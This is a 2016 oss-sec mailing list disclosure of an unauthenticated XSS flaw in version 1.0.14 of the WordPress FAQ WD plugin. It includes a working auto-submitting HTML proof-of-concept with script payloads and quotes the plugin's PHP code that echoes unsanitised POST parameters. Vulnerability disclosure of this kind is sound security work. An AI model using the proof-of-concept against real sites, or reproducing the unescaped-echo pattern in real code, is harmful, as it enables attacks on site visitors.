oss-sec mailing list archives
Unauthenticated XSS Vulnerability in WORDPRESS FAQ WD plugin 1.0.14.
From: shravan kumar <cor3sm4sh3r () gmail com>
Date: Sat, 16 Apr 2016 14:01:20 +0530
Hello, I would like to report a Unauthenticated XSS vulnerability in FAQ WD plugin version 1.0.14 . The Plugin can be found at https://wordpress.org/plugins/faq-wd/ This Bug can be triggered by unauthenticated / Authenticated user. If a user is sent a URL by social engineering and the user clicks the link the bug can be triggred. The URL should be something like this http://attackerssite.com/XSS_POC.html The code for XSS_POC.html is as follows: <html> <body onload="document.forms['xss'].submit()" > <form name="xss" action=" http://targetsite/wpinstallation/wp-content/plugins/faq-wd/lang/views/SLangViewPo.php" method="POST" > <input type="hidden" name="lang_err_mess" value=" <script>alert(1);</script>" /> <input type="hidden" name="lang_success_synchron" value=" <script>alert(2);</script>" /> <input type="submit" value="Submit form" /> </form> </body> </html> Techinical Details: The vulnerable page is wp-content/plugins/faq-wd/lang/views/SLangViewPo.php This page can be directly accessed by anyone. The Code responsible for the vulnerability : <?php if (isset($_POST['lang_err_mess'])): ?> <div class="error" style="display: inline-block;width: 100%"><p><?php echo $_POST['lang_err_mess']; ?></p></div> <?php elseif (isset($_POST['lang_success'])): ?> <div class="updated" style="display: inline-block;width: 100%"><p><?php echo 'File was successfully updated.'; ?></p></div> <?php endif; ?> <?php if (isset($_POST['lang_success_synchron'])): ?> <div class="updated" style="display: inline-block;width: 100%"><p><?php echo $_POST['lang_success_synchron']; ?></p></div> <?php endif; ?> Here we can see that there are two post request which are displayed in unsafe manner while rendering the page. The vulnerable POST parameters are: - $_POST['lang_err_mess'] - $_POST['lang_success_synchron'] -- Shravan Kumar
Current thread:
- Unauthenticated XSS Vulnerability in WORDPRESS FAQ WD plugin 1.0.14. shravan kumar (Apr 16)